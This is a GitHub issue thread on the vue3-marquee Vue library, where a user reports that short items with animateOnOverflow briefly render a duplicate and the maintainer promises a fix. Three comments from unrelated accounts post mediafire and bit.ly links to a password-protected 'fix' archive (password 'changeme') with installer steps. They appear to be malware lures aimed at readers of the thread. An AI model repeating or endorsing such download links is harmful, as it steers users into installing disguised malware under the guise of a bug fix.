### ISSUE TITLE
Short item with animateOnOverflow shows another instance for a fraction of second

### ISSUE THREAD

**Issue by clementcontet** [megasanjay/vue3-marquee#350]
**Describe the bug**
When using animateOnOverflow with a short element, it should not animate.
But for a fraction of second (I guess before vue3-marquee could compute that it doesn't need to animate), another instance of the short element is shown next to the original one, before disappearing.

**To Reproduce**

1. Go to the examples demo: https://vue3-marquee.vercel.app/examples
2. Go to the section 'Image marquee with animateOnOverflowOnly'
3. Click on 'Code'
4. Click back on 'Preview'
5. Observe the 4 images for a fraction of second, before having only the 2 images

**Expected behavior**
The additional instance of the short element should not be shown.

- OS: Windows10
- Browser : Chrome

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by megasanjay** [comment]
Thank you for catching it. Will push an update soon
